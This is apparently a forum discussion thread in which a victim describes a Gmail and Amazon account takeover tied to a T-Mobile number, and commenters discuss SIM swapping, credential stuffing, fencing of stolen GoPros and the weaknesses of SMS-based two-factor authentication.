I was a victim of this last October and November on a T-Mobile number. This is what occurred:
- My Gmail account was compromised
- My Amazon account was compromised
In Gmail, they added a filter to hide any shipping or customer service messages from Amazon.
In Amazon, every other day, they placed an order for a ~500 USD GoPro device, delivered to an address in NYC. This address changed with every order.
Both passwords to both accounts were kept the same.
After I caught on to the above once I received my credit card statement, in November:
- They attempted to purchase something with my credit card. Security mechanisms triggered, and a verification code was sent to my phone at 4am in the morning. They successfully validated and placed the order. My credit card company assures me they input the right verification code.
- They applied for an Amazon credit card using my identity. It was auto approved, and they used the credit card to purchase ~5k worth of items.
I moved everything off of that T-Mobile number, and switched over to GoogleFi (only to learn GoogleFi uses T-Mobile also... still better than T-Mobile directly I'm hoping).
Edit:
I also wiped my phone, eventually thought that wasn't far enough, and switched to a new device entirely. I'm still unsure how the above occurred, because some of it feels beyond the scope of a SIM-swap.
As an InfoSec professional, what you describe sounds more like a device-level compromise of your iphone, perhaps through a malicious app, or link you clicked.
What your experienced can't be done with just a sim swap attack, as you would have lost access to your phone number. And it can't be done with the described T-Mobile hack, as it would have given the hackers silent access to your texts, so they could have reset your Gmail password, but then you would have noticed a password change (and you claim it didn't change.)
Read up on credential stuffing, this is increasingly common. With all the recent breaches, there are groups that use old passwords to quickly identify MFA locked accounts behind re-used passwords. These lists are then sold to people who will, one at a time, pay about 10k for a SIM swap on individually targeted users.
There are lists floating around with 10s of thousands, or hundreds of thousands of users with known passwords in Google, Amazon, Paypal, Coinbase, etc.
The parent comment has a point though - after SIM swap attack, all SMS messages would stop arriving at the victim device - unless the attackers swap it back again after every 2FA code. If they had access to a dashboard at t-mobile this might be possible but it sounds like a lot of effort to steal a few thousand dollars.
The victim (ctvo) claims in another comment down the thread that he had a unique Gmail password not re-used on any other service. So I wrote my comment assuming this is true. But, indeed, if his Gmail password was weak and guessable, then the T-Mobile hack would have allowed the hackers to validate MFA and log in.
That assumes their password wasn't already compromised. If they re-used their Gmail password somewhere else, the attacker could have already had their Gmail password and only needed the SIM-swap to verify the login.
The victim (ctvo) claims in another comment down the thread that he had a unique Gmail password not re-used on any other service. I commented assuming this premise is true.
No need to be aggro about it. No one’s suggesting iPhones are unhackable, just that realistically utilizing an iOS or Android exploit like that is a bit much for something simple like credit card fraud. Those exploits are valuable.
There must be something especially lucrative about GoPros as stolen devices.
I’ve heard multiple independent stories from a few friends in Law Enforcement about cases involving trafficking of large quantities of stolen GoPros (obtained via methods not unlike what happened to you).
Interesting you mention NYC - at least one of these cases involved a very high volume fencing syndicate operating as a legitimate storefront in NYC - with merchandise fraudulently obtained from Amazon[0]. A friend of mine worked this case.
Small, fairly high value, high demand, and no remote shutdown/disable/reporting - somewhat of a perfect storm I suppose.
If you go on ebay, you can find tons of shady gopro listings.
They'll have all the original packaging and put it up as a "pre-owned" unit, but then you open the listing and they have 20 of them for sale.
We also had a local hotel/waterpark that was running a burglary/fencing operation in the mid aughts. The room cleaners would look for gopros, iphones and other electronics. If they found anything, they'd take it and hand it over to the two managers, who then fenced it out to local guys who'd either pawn them or sell it on Craigslist and they'd split the money.
Customers routinely complained to the managers who were the fences so they'd tell the customer they'd fill out a complaint form and send in a police report to the local PD. Obviously, that never happened. This went on for about two years until people on social media and review sites like Yelp started discovering what was happening was not an accident. They finally busted the ring and within a few weeks, the waterpark and hotel were shut down for various other repeated OSHA and other infractions that went unfixed. The local paper reported even though they busted the ring, the money and the goods were long gone, leaving the victims with little recourse.
To be honest, there is already zero way to distinguish between shipping and customer service messages from Amazon. If you order any appreciable amount of items you would have no idea they sent you any message.
Of course I only found this out after being burned by it. Turns out they’d sent me a message telling me the item I returned was not in the same condition it was sent in (it was), but the message was utterly lost in the flood of ‘order received/sent/delivered’ mails they send (with the same subject).
I think Gmail has a big yellow notice in your account for 7 data after a new forwading e-mail address is added. That of course falls apart when you use an external client but there’s that.
I think years ago I found my number there with no-recollection of every agreeing to it and quickly yeeted it. (You can remove the number but keep recovery email)
It's subtle with the UI but you can choose not to allow SMS by removing your phone number from Google after setting up alternative 2FA. If they don't have a number they can't sim-jack
This is one of the most important pieces of security advice that is often overlooked: remove your phone number from EVERYTHING.
You can also enable Advanced Protection[1] for your Google account, but other repeat offenders like Github will continue to allow SMS fallback to bypass 2FA if you have a phone number listed anywhere.
Big benefit of Advanced Protection: you can go tell less technical users to set it up and it will enforce all these best practices (no SMS, two keys, no giving random apps access to GMail...).
The prohibition against using a VoIP number for banking purposes is stupid. They already have the full battery of KYC info on me: if I want to use a VoIP number for 2FA (because they are so behind the times they don't support FIDO or even TOTP) then unless law says they cannot they need to allow it.
And while on the topic of banks, most will suspend access to your online portal if you log in with a VPN. Give me a bank that allows VoIP phone numbers, VPN access, and TOTP and/or FIDO support for 2FA and I'll ditch Schwab right now.
They both use Symantec VIP but it’s fairly easy (for developers at least) to export those tokens and import them into something like Authy, Google Authenticator etc.
My bank used to allow email 2fa or SMS, but they recently dropped support for email. I don’t love using email for 2fa but since my email is itself protected with non-SMS 2fa I thought it was the best of the two bad options. Now I’m sad. Ideally my bank would support the FIDO standard and I would use a compatible hardware token.
In the case of Schwab it's only with their app. If I wanted a geolocation leash up my ass I wouldn't be complaining about this: if they don't trust me as a customer then screw them, I'll find a bank who does. Schwab's notion of non-SMS 2FA is their app. I want to use my laptop on a VPN using a FIDO key or TOTP and Schwab doesn't support this.
Do you happen to know if they allow you to also totally disable SMS 2FA?
I know that Vanguard, for instance, supports non-SMS 2FA but doesn't let you disable SMS as a fallback (and I'd rather not just totally remove all phone numbers, but maybe I have to...).
I had their non-SMS Symantec 2FA set up a couple years back, but turned it off cause I couldn't figure out how to disable the SMS fallback. Every time I got a new device and wanted to set up the Symantec TOTP generator they would just send me a SMS for validation. So I just told them to turn off the Symantec part.
Maybe they've changed their policy since then. But when you call to get set up on a new device, how do they verify your identity now if you don't have SMS fallback?
I have Ally and Chime and I’m extremely disappointed neither accepts a Yubikey or something. Older banks like Schwab or US Bank I could see being behind the times, but I’d expect fintech or something more modern to be more sensible.
I used to as well, but lots of places have stopped accepting VoIP numbers now. A bunch of them actually just silently fail to send messages, so you can be clicking SMS password reset and get nothing in your texts.
Ally forced me recently to get rid of the Google Voice (GV) number and email for two-factor and use a 'real' mobile number. It is pretty awful how they offer no other two-factor mechanism except a non-GV mobile number.
Something doesn't add up here because last I checked Amazon made you put the credit card number in again if you want to ship to a new address. Just breaking in to your amazon account wouldn't be sufficient to ship stuff to random addresses using your credit card.
Interesting... I had something similar happen to me, with minimal outward, acute damage (e.g., running up bills on random credit cards). It is reasonable to assume my entire identity is compromised. Sorry this happened.
How do you know T-Mobile was the entry point, and not say, Google (e.g., Google Chrome, Google Ads)?
What type of phone did you have (e.g., Android or iPhone)?
What is your browser and Search Engine on your smartphone?
SMS in unencrypted, and Google SE has been compromised for much if not all of 2022. From what I can tell the issue persists. I officially reported it in December, and again in January, and again in February. Pretty wild, TBH. Think about the number of services that have Google SE and Ads integration. Makes me nauseous.
Did you happen to report to Apple and Google (for documentation)?
Ways which I shared with Google, because it's a very serious privacy and security vulnerability.
We need more robust security integration to catch things before they are pushed to results. I understand latency will increase, and some ads revenue will decrease. But like, isn't it also cool to have a customer base that is better protected against egregious attacks, attacks that could be prevented? IMO, yes. It's called "stewardship."
Probably SMS as a 2FA option on Gmail, which is the real problem. Once you add your Yubikey and set up TOTP as a backup, you need to go back and delete SMS as a 2FA option. Had gmail been configured correctly, the SIM swap would have far less serious.
I used to work tech support for cell phone providers, and while we were trained about fraud, the nature of the industry low wages, high turnover, makes this a security flaw that financial institutions should not risk.
How is SMS a security risk? As far as I know, SMS is closely tied to a person's identity, especially 'know your customer' regulations. I'm curious how it's a security risk; as far as I know they have to be unique, which is good
Wait. Isn't it painfully obvious when you've been simjacked? If your phone suddenly loses signal and refuses to register with the network, you know something is up. You may think it was a malfunction of your phone or your network, but it's pretty much a definition of a modern-day "drop everything you're doing and deal with it" emergency. You can't not be aware of it, or be unsure if it happened to you.
You very much can not be aware of it. Consider what happens when you're simswapped at 2 am. Are you going to notice that? Probably not. And maybe not after you get up and check your phone. Because your phone may be connected to the internet via your home wifi and you don't even notice your phone has no bars and no service because you're still able to browse the web and check email.
But if the attacker already has your info, then couldn't they just add another line to your mobile plan, so your handset continues working, just with a new, unbeknownst to you phone number? That way it wouldn't be noticable on the handset.
The real question is how long do you think it would take you to break into your own Gmail account after the passwords been changed and the attached phone numbers also been changed?
Probably longer than it would take an attacker to drain bank accounts, I figure.
By the time you notice and can react it's too late. There have also been many prominent examples of people who got their cryptocurrency exchange accounts broken into with SIM hijacking which was conducted while the victim was asleep.
Do you live in the US? You don't need an ID to get a phone number here so SMS is not necessarily tied to your identity and it has nothing to do with KYC.
Moreover, you don't want it to be tied to your identity. The fact that anyone can pretend to be you and hijack your phone number is exactly what makes it insecure.
Anyone can walk into a T-Mobile store with a fake driving license with your name on it and claim they need help moving their phone number to their new phone. This is of course your number. They will then receive all of your SMS messages.
Or, you know, they can just bribe the store employees. Has happened before, still happens, will keep happening as long as a phone number is considered important for anything at all.
Remove it from both. However make sure that you have quite a lot of backups of your 2FA backup keys, and maybe even one offline backup of your seed, if you lose them, the account is gone (which is a good thing, I guess).
Thanks. I have Google backup codes as well as multiple Authy installations, Google prompt and a recovery email address so I guess I should be covered :)
2FA on everything. No password reused. Only similarity is both had the T-Mobile number attached to them.
I initially thought only Amazon was compromised. I thought it was due to us throwing away a FireTV device (assumption: we didn't log out and de-register) that was then used to order items.
And then I found they added filters to my Gmail account to hide the Amazon orders, and went into full panic mode.
Interesting. Was your 2FA setup to use Google Authenticator or regular SMS? It's been a while since I used Google services but from what I recall from a previous company where we used Gmail was that the only way to do 2FA with Google Authenticator if you lost access to the phone was with a backup code you are given at 2FA setup time. Is that no longer the case?
2FA with authenticator. As someone correctly points out, Google appears to keep SMS as a recovery option unless you specifically opt out?
Edit: I can't actually find a help article, but it's under "Try another way to sign-in" and they'll text you a verification code to your registered account phone number.
SMS is just used to sign in. Everything is encrypted, and you can't access any data without a password. If you don't have the password, you don't get the data. There is no recovery.
Another different failure point. I once broke my android phone and bought and set up a new one - only to find I can no longer access my Gmail account that I used before with my Google authenticator, so I am locked out forever from that account. I had a backup but was not able to find it. Despite knowing hundreds of contact emails (all backed up in thunderbird), account history, password history, etc - for years I have not been able to get back in.
So you didn't have one lol. I understand that's an extremely frustrating situation though. Part of making backups is testing them once in a while (at least making sure they exist). Something else you could've done previously was to use Authy or Aegis which helps you backup the seeds themselves encrypted under a passphrase so you can recover the accounts even if you lose everything else. Although of course, all of this depends on your threat model, if you don't care about SIM swaps or if losing the account is still much more worrying then I guess it's just a unnecessary hassle/risk.
With Authy I can enter a backup password and download everything to a new phone. I suppose that's a different failure point but still possibly worth the trade-off? Yubikey is the next level up.
So if you didn't have a credit card, nothing would have happened? Why do people still use credit cards if they are so fucking leaky and easy to exploit?
Googlefi just uses their towers, your telecom data isn’t communicated with T-Mobile just the data of whatever you’re using (calls Netflix browsing porn)
I don't know if it's controversial, but I think for most people, keeping up with your current card statement isn't something you do daily. Sometimes companies have a way to notify you of new charges immediately, sometimes not. Being surprised at the end of the month is more common than you'd think.
I for one don't really look at any banking stuff these days. I just live well within my means. If you have a generally healthy financial situation there is no need to constantly check.
It will be easier to go after high income middle class types than HVTs, who will likely have someone watching things closer than busy working folk.
If you hit a target for multiple low value charges you face less scrutiny than large transactions. Fraud should pickup multiple purchases of the same product to different addresses though.
- My Gmail account was compromised
- My Amazon account was compromised
In Gmail, they added a filter to hide any shipping or customer service messages from Amazon.
In Amazon, every other day, they placed an order for a ~500 USD GoPro device, delivered to an address in NYC. This address changed with every order.
Both passwords to both accounts were kept the same.
After I caught on to the above once I received my credit card statement, in November:
- They attempted to purchase something with my credit card. Security mechanisms triggered, and a verification code was sent to my phone at 4am in the morning. They successfully validated and placed the order. My credit card company assures me they input the right verification code.
- They applied for an Amazon credit card using my identity. It was auto approved, and they used the credit card to purchase ~5k worth of items.
I moved everything off of that T-Mobile number, and switched over to GoogleFi (only to learn GoogleFi uses T-Mobile also... still better than T-Mobile directly I'm hoping).
Edit:
I also wiped my phone, eventually thought that wasn't far enough, and switched to a new device entirely. I'm still unsure how the above occurred, because some of it feels beyond the scope of a SIM-swap.